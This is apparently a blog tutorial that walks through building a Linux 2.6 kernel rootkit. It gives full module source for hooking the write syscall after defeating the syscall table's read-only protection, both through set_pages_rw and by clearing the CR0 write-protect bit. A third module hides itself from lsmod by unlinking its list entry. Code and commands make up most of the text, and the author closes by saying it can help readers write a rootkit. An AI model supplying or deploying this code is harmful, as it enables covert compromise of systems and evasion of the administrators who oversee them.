In this guide I explain how to hijack a syscall on 2.6.* kernels: in particular, how to bypass the kernel's write protection of the syscall table and the write-protect (WP) bit of the CPU's CR0 register.

I won't explain what a syscall or the syscall table is: I assume you already know.



– Accessing the Syscall Table

If you have tried to run a rootkit written for 2.4.* kernels, you will know that it doesn't work on 2.6.* systems.

In kernel 2.6.* the “sys_call_table” symbol is no longer exported, so you can't access it directly; moreover, the memory pages in which the table resides are now write-protected.

So we can no longer access the table in this way:

extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer;

But the table is still in memory: if we know its address we can access it through a simple pointer. There are many ways to find this address: the simplest is to search the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled and contains the kernel's symbols and their addresses.

An excerpt of this file follows:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic
...
c018d140 t cgroup_remount
c018d260 T cgroup_path
c018d310 t allocate_cg_links
c018d410 t find_css_set
c018d7d0 T cgroup_attach_task
c018da40 T cgroup_clone
c018dcc0 t cgroup_tasks_write
c018dd90 t cgroup_release_agent
c018df50 t proc_cgroup_show
c018e180 t cgroup_pidlist_find
c018e320 t cgroup_write_event_control
c018e610 t pidlist_allocate
c018e640 t pidlist_array_load
...

We are only interested in the “sys_call_table” address:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table
c05d2180 R sys_call_table
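The same lookup can be sketched in plain userspace C. This is only an illustration of the “address type name” line format shown above: the function name “match_symbol” and its signature are my own, not part of any kernel or libc API. Unlike grep, it compares the whole symbol name, so it will not match a longer symbol that merely contains the string.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one System.map line of the form "<hex address> <type> <name>".
 * Returns 1 and stores the address and type letter when the name is
 * exactly `wanted`, 0 otherwise. Hypothetical helper, for illustration.
 */
int match_symbol(const char *line, const char *wanted,
                 unsigned long *addr, char *type)
{
    unsigned long a;
    char t;
    char name[128];

    assert(line != NULL && wanted != NULL && addr != NULL && type != NULL);

    /* %127s stops at whitespace, so a trailing newline is not captured. */
    if (sscanf(line, "%lx %c %127s", &a, &t, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;

    *addr = a;
    *type = t;
    return 1;
}
```

Feeding it each line read with fgets() from the System.map file and stopping at the first match gives the address and the type letter that grep printed above.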

– Bypass Kernel Write Protection

Now we have the table's address. But if you looked at the output of the “grep” command you will have seen an ‘R’ next to it: this symbol type means that the table lives in a read-only data section.

Indeed, the kernel places some structures in read-only memory: this protects them against intentional or unintentional changes that could lead to system instability. So we have to make the pages holding this structure writable if we want to modify it.

Fortunately, the kernel provides functions for this task, which we call through function pointers:

void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;

The “pages_rw” function makes “numpages” pages writable, starting at the page passed as an argument; “pages_ro” makes them read-only again. Both take a “struct page” pointer rather than an address, so we use the “virt_to_page()” function, which converts a kernel virtual address into the “struct page” that describes the physical page backing it. To call the “pages_*” functions we have to know their addresses, which we can obtain from the “System.map” file:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro
c012fbb0 T set_pages_rw
c012fe80 T set_pages_ro
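Since the “pages_*” functions work on whole pages, it helps to see the page arithmetic behind the “numpages” argument. The following userspace sketch assumes 4 KiB pages (the usual size on 32-bit x86); the names “DEMO_PAGE_SIZE”, “demo_page_base” and “demo_pages_spanned” are made up for this example and are not kernel functions.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed page size: 4 KiB, the usual value on 32-bit x86. */
#define DEMO_PAGE_SIZE 4096UL

/* Start address of the page that contains addr. */
unsigned long demo_page_base(unsigned long addr)
{
    return addr & ~(DEMO_PAGE_SIZE - 1);
}

/* Number of pages touched by the byte range [addr, addr + len). */
unsigned long demo_pages_spanned(unsigned long addr, size_t len)
{
    unsigned long first, last;

    assert(len > 0);
    first = demo_page_base(addr);
    last = demo_page_base(addr + len - 1);
    return (last - first) / DEMO_PAGE_SIZE + 1;
}
```

With the address found above, demo_page_base(0xc05d2180) is 0xc05d2000, so the table starts 0x180 bytes into its page. Passing 1 as “numpages” is enough only if the entries we want to change lie inside that first page; a range that crosses a page boundary needs 2.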

Now we can access and modify the sys_call_table in this way:

...
unsigned long *syscall_table = (unsigned long *)0xc05d2180;
...
void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;
...
static int init(void)
{
    struct page *_sys_call_page;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    // pass the table's address, not the address of the pointer variable
    _sys_call_page = virt_to_page(syscall_table);
    pages_rw(_sys_call_page, 1);
    // now we can use the sys_call_table
    ...
}

Here is the complete example source code (hijack.c):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180;

void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count)
{
    // hijacked write
    printk(KERN_ALERT "WRITE HIJACKED");
    return (*original_write)(fd, buf, count);
}

static int init(void)
{
    struct page *sys_call_page_temp;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    // find the page that holds the table and make it writable
    sys_call_page_temp = virt_to_page(syscall_table);
    pages_rw(sys_call_page_temp, 1);

    // save the original handler, then install ours
    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;

    return 0;
}

static void exit(void)
{
    struct page *sys_call_page_temp;

    sys_call_page_temp = virt_to_page(syscall_table);

    // restore the original handler and make the page read-only again
    syscall_table[__NR_write] = (unsigned long)original_write;
    pages_ro(sys_call_page_temp, 1);

    printk(KERN_ALERT "MODULE EXIT\n");
    return;
}

module_init(init);
module_exit(exit);

Here is a “Makefile” to compile the source code:

obj-m := hijack.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko

– Bypass CR0 Protection

x86 CPUs have a write-protect flag (WP) in the CR0 control register: it is bit 16, and it was introduced with the Intel 80486. When WP is set, the CPU enforces read-only page protection even for code running in kernel mode. It should not be confused with bit 0 of CR0 (PE), which enables “protected mode”, introduced with the Intel 80286. We can check whether our CPU supports this kind of protection in this way:

spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp
wp : yes
wp : yes

Wikipedia has a brief description of the CR0 register: there you can see that bit 16 (WP) is the one that deals with write protection. If WP is set to 1, the CPU refuses writes to read-only pages even from kernel mode; if it is 0, kernel-mode code can write to them.
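The check done with grep can also be written as a small userspace C helper. This is just a sketch of how one “key : value” line of /proc/cpuinfo could be tested; “demo_line_reports_wp” is a name I made up, and the line layout it expects is the one shown in the output above.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Return 1 if the line is exactly the cpuinfo entry "wp : yes"
 * (any amount of spaces or tabs around the colon), 0 otherwise.
 * Hypothetical helper, for illustration only.
 */
int demo_line_reports_wp(const char *line)
{
    char key[32];
    char value[32];

    assert(line != NULL);

    /* The key is read up to the first colon, space or tab. */
    if (sscanf(line, " %31[^: \t] : %31s", key, value) != 2)
        return 0;

    return strcmp(key, "wp") == 0 && strcmp(value, "yes") == 0;
}
```

Calling it on every line read from /proc/cpuinfo gives one hit per logical CPU, which is why the grep output above shows two lines.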

If WP is set and the table's page is still mapped read-only when the module writes to it, the write faults and the kernel kills the “insmod” process:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
Killed

So if we set this bit to 0, kernel code can write to read-only memory pages, including the one that holds the syscall table.

Again the kernel provides us with two functions:

#define read_cr0() (native_read_cr0())
#define write_cr0(x) (native_write_cr0(x))

The native read/write functions are defined as follows:

static inline unsigned long native_read_cr0(void)
{
    unsigned long val;
    asm volatile("movl %%cr0,%0\n\t" : "=r" (val));
    return val;
}

static inline void native_write_cr0(unsigned long val)
{
    asm volatile("movl %0,%%cr0" : : "r" (val));
}

The “read_cr0” function returns the value of the register CR0; the “write_cr0” function sets the bits of the register based on the value passed as parameter.

Now we can disable and re-enable write protection like this:

/* disable write protection
   ~0x10000 is 0xFFFEFFFF on a 32-bit system: every bit set except bit 16.
   ANDing it with the current value of the CR0 register clears the WP bit
   and leaves the other bits untouched, so write protection is disabled. */
write_cr0(read_cr0() & (~0x10000));

/* enable write protection
   ORing the current value of the CR0 register with 0x10000 sets the WP bit
   to 1, so write protection is enabled again. */
write_cr0(read_cr0() | 0x10000);
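The bit arithmetic can be tried safely in userspace, without touching the real register. In this sketch the CR0 value is just a 32-bit number passed as a parameter; the names “DEMO_CR0_WP”, “demo_clear_wp”, “demo_set_wp” and “demo_check_masks” are invented for the example.

```c
#include <assert.h>
#include <stdint.h>

/* WP is bit 16 of CR0, hence the 0x10000 mask used in the post. */
#define DEMO_CR0_WP (UINT32_C(1) << 16)

/* Clear only the WP bit; every other bit keeps its value. */
uint32_t demo_clear_wp(uint32_t cr0)
{
    return cr0 & ~DEMO_CR0_WP;
}

/* Set only the WP bit; every other bit keeps its value. */
uint32_t demo_set_wp(uint32_t cr0)
{
    return cr0 | DEMO_CR0_WP;
}

/* Self-check documenting the two masks involved. */
void demo_check_masks(void)
{
    assert(DEMO_CR0_WP == 0x10000u);
    assert((uint32_t)~DEMO_CR0_WP == 0xFFFEFFFFu);
}
```

For an illustrative value such as 0x80050033, demo_clear_wp() gives 0x80040033 and demo_set_wp() on that result gives 0x80050033 again: only bit 16 changes in either direction.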

Here is “hijack.c” modified accordingly (“hijack2.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count)
{
    // hijacked write
    printk(KERN_ALERT "WRITE HIJACKED");
    return (*original_write)(fd, buf, count);
}

static int init(void)
{
    printk(KERN_ALERT "\nHIJACK INIT\n");

    // clear WP, patch the table, then set WP again
    write_cr0(read_cr0() & (~0x10000));
    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;
    write_cr0(read_cr0() | 0x10000);

    return 0;
}

static void exit(void)
{
    // clear WP, restore the original handler, then set WP again
    write_cr0(read_cr0() & (~0x10000));
    syscall_table[__NR_write] = (unsigned long)original_write;
    write_cr0(read_cr0() | 0x10000);

    printk(KERN_ALERT "MODULE EXIT\n");
    return;
}

module_init(init);
module_exit(exit);

Makefile:

obj-m := hijack2.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module without problems:

spaccio@spaccio-laptop:~$ sudo insmod hijack2.ko
spaccio@spaccio-laptop:~$

– Hide Kernel Module

We can easily hide our module by removing it from the kernel's module list, which is what lsmod and /proc/modules show. Look at the following source code (“hijack3.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

static int init(void)
{
    // unlink this module's entry from the list of loaded modules
    list_del_init(&__this_module.list);
    return 0;
}

static void exit(void)
{
    return;
}

module_init(init);
module_exit(exit);

We compile and run it:

obj-m := hijack3.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

If we look at the output of lsmod, our module is not there:

spaccio@spaccio-laptop:~$ sudo insmod hijack3.ko
spaccio@spaccio-laptop:~$ lsmod
Module                  Size  Used by
kernel_redir            2200  1
aes_i586                7280  2
aes_generic            26875  1 aes_i586
rfcomm                 33811  6
binfmt_misc             6599  1
sco                     7998  2
bnep                    9542  2
l2cap                  37008  16 rfcomm,bnep
vboxnetadp              6454  0
vboxnetflt             15216  0
...
spaccio@spaccio-laptop:~$ lsmod | grep hijack3
spaccio@spaccio-laptop:~$

This happens thanks to the “list_del_init()” function, which is defined as follows:

static inline void list_del_init(struct list_head *entry)
{
    __list_del(entry->prev, entry->next);
    INIT_LIST_HEAD(entry);
}

The “__list_del()” and “INIT_LIST_HEAD()” functions are in turn defined as follows:

static inline void __list_del(struct list_head *prev, struct list_head *next)
{
    next->prev = prev;
    prev->next = next;
}

static inline void INIT_LIST_HEAD(struct list_head *list)
{
    list->next = list;
    list->prev = list;
}

So the “list_del_init()” function unlinks our module's entry from the doubly linked list that holds the loaded modules: this way it can no longer be found by lsmod (or in /proc/modules).
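To see why the entry disappears from a list walk, the same list operations can be reproduced in userspace. This is a standalone sketch: the structure and the first three functions mirror the kernel definitions quoted above, while “list_count” and “list_contains” are helpers I added for the demonstration.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace copy of the kernel's list node, for illustration only. */
struct list_head {
    struct list_head *next, *prev;
};

void INIT_LIST_HEAD(struct list_head *list)
{
    list->next = list;
    list->prev = list;
}

/* Insert entry right after head. */
void list_add(struct list_head *entry, struct list_head *head)
{
    entry->next = head->next;
    entry->prev = head;
    head->next->prev = entry;
    head->next = entry;
}

/* Unlink entry from its neighbours, then make it point to itself. */
void list_del_init(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    INIT_LIST_HEAD(entry);
}

/* Count the entries reachable from head (hypothetical helper). */
size_t list_count(const struct list_head *head)
{
    const struct list_head *pos;
    size_t n = 0;

    assert(head != NULL);
    for (pos = head->next; pos != head; pos = pos->next)
        n++;
    return n;
}

/* Return 1 if entry is reachable from head (hypothetical helper). */
int list_contains(const struct list_head *head, const struct list_head *entry)
{
    const struct list_head *pos;

    assert(head != NULL && entry != NULL);
    for (pos = head->next; pos != head; pos = pos->next)
        if (pos == entry)
            return 1;
    return 0;
}
```

If three nodes are added to an empty list and list_del_init() is called on one of them, list_count() drops from 3 to 2 and list_contains() no longer finds the removed node, although the node itself still exists in memory and now points to itself.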

– Conclusion

The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).

Bye.